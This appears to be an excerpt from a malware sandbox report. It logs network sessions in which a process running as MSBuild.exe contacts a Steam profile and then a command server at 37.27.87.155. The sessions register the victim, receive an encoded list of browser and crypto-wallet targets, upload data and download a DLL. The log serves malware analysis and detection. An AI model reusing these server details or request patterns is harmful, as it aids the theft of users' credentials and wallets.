                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:44.792586088 CEST49760443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:44.792614937 CEST4434976037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:44.792850971 CEST49760443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:44.792864084 CEST4434976037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:45.675712109 CEST4434976037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:45.675801039 CEST4434976037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:45.675829887 CEST49760443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:45.675893068 CEST49760443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:45.676249027 CEST49760443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:45.676290035 CEST4434976037.27.87.155192.168.2.4

                                                                                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:07.444802046 CEST5912153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:07.550335884 CEST53591211.1.1.1192.168.2.4

                                                                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:07.444802046 CEST192.168.2.41.1.1.10xe23eStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:07.550335884 CEST1.1.1.1192.168.2.40xe23eNo error (0)steamcommunity.com23.76.43.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:15.548744917 CEST1.1.1.1192.168.2.40x11f5No error (0)windowsupdatebg.s.llnwi.net69.164.42.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:15.893414021 CEST1.1.1.1192.168.2.40x615bNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:15.893414021 CEST1.1.1.1192.168.2.40x615bNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:28.648082972 CEST1.1.1.1192.168.2.40xac5eNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:28.648082972 CEST1.1.1.1192.168.2.40xac5eNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                          • steamcommunity.com
                                                                                                                                                                                                                                                                          • 37.27.87.155

                                                                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          0192.168.2.44973123.76.43.594434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:07 UTC119OUTGET /profiles/76561199673019888 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:08 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                                                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:08 GMT
                                                                                                                                                                                                                                                                          Content-Length: 33790
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: sessionid=6c8c60d43ffaa978c4302569; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7C0260b8e04ad19c244dfaa60e7b0ec044; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                          2024-04-20 12:28:08 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                                                          2024-04-20 12:28:08 UTC10062INData Raw: 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6c 69 6e 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0d 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                                                                          Data Ascii: obal_action_link" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">
                                                                                                                                                                                                                                                                          2024-04-20 12:28:08 UTC9214INData Raw: 74 65 61 6d 67 61 6d 65 73 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 70 61 72 74 6e 65 72 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 54 45 52 4e 41 4c 5f 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 73 74 61 74 73 2e 76 61 6c 76 65 2e 6f 72 67 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 5f 43 4c 49 45 4e 54 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 55 53 45 5f 50 4f 50 55 50 53 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 49 43 4f 4e 5f 42 41
                                                                                                                                                                                                                                                                          Data Ascii: teamgames.com\/&quot;,&quot;STATS_BASE_URL&quot;:&quot;https:\/\/partner.steampowered.com\/&quot;,&quot;INTERNAL_STATS_BASE_URL&quot;:&quot;https:\/\/steamstats.valve.org\/&quot;,&quot;IN_CLIENT&quot;:false,&quot;USE_POPUPS&quot;:false,&quot;STORE_ICON_BA


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          1192.168.2.44973237.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:09 UTC169OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:09 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-04-20 12:28:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          2192.168.2.44973337.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:10 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DGHIECGCBKFHIEBGHDBK
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Content-Length: 279
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:10 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 36 46 31 44 42 35 42 45 38 39 38 32 33 33 33 33 36 34 31 39 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 35 66 34 30 39 31 31 35 35 37 63 34 63 63 32 33 34 37 34 64 35 37 36 31 30 35 36 38 65 65 62 0d 0a 2d 2d 2d 2d 2d 2d
                                                                                                                                                                                                                                                                          Data Ascii: ------DGHIECGCBKFHIEBGHDBKContent-Disposition: form-data; name="hwid"C6F1DB5BE8982333364192-a33c7340-61ca-11ee-8c18-806e6f6e6963------DGHIECGCBKFHIEBGHDBKContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------
                                                                                                                                                                                                                                                                          2024-04-20 12:28:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:10 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-04-20 12:28:10 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 37 32 39 37 30 32 32 64 36 62 35 30 33 36 64 62 35 37 61 35 32 39 31 31 61 34 37 62 66 38 64 39 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 3a1|1|1|0|7297022d6b5036db57a52911a47bf8d9|1|1|1|0|0|50000|00


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          3192.168.2.44973437.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:11 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----CFCBKKKJJJKKEBGDAFID
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:11 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 32 39 37 30 32 32 64 36 62 35 30 33 36 64 62 35 37 61 35 32 39 31 31 61 34 37 62 66 38 64 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 35 66 34 30 39 31 31 35 35 37 63 34 63 63 32 33 34 37 34 64 35 37 36 31 30 35 36 38 65 65 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------CFCBKKKJJJKKEBGDAFIDCont
                                                                                                                                                                                                                                                                          2024-04-20 12:28:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:12 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-04-20 12:28:12 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                                                                                          Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          4192.168.2.44973537.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:12 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFC
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:12 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 32 39 37 30 32 32 64 36 62 35 30 33 36 64 62 35 37 61 35 32 39 31 31 61 34 37 62 66 38 64 39 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 35 66 34 30 39 31 31 35 35 37 63 34 63 63 32 33 34 37 34 64 35 37 36 31 30 35 36 38 65 65 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------BKFBAKFCBFHIJJJJDBFCCont
                                                                                                                                                                                                                                                                          2024-04-20 12:28:13 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:13 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-04-20 12:28:13 UTC5165INData Raw: 31 34 32 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                          Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          5192.168.2.44973637.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:14 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Content-Length: 6237
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:14 UTC6237OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 32 39 37 30 32 32 64 36 62 35 30 33 36 64 62 35 37 61 35 32 39 31 31 61 34 37 62 66 38 64 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 35 66 34 30 39 31 31 35 35 37 63 34 63 63 32 33 34 37 34 64 35 37 36 31 30 35 36 38 65 65 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------CFCBFBGDBKJKECAAKKFHCont
                                                                                                                                                                                                                                                                          2024-04-20 12:28:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:15 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-04-20 12:28:15 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          6192.168.2.44973737.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:15 UTC177OUTGET /sqln.dll HTTP/1.1
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:15 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:15 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 2459136
                                                                                                                                                                                                                                                                          Last-Modified: Thu, 18 Apr 2024 12:03:08 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          ETag: "66210bfc-258600"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
